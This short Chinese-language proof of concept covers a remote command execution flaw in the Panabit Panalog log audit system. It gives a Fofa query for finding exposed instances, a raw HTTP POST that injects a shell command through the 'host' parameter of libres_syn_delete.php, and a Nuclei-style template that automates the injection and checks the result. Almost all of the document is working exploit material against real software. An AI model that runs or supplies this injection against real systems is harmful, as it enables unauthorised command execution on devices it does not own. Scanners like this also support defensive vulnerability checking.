Panalog 日志审计系统RCE漏洞

# Fofa搜索语法app="Panabit-Panalog"

POST /content-apply/libres_syn_delete.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: close token=1&id=2&host=| echo "Hello World!" >lanyue.txt

id: Panalog-RCE info:  name: Panalog   author: LanYue  severity: high  metadata:     fofa-query: app="Panabit-Panalog"variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /content-apply/libres_syn_delete.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip        Connection: close                token=1&id=2&host=| echo "Hello World!" >{{filename}}.txt       - |        GET /content-apply/{{filename}}.txt HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0       matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")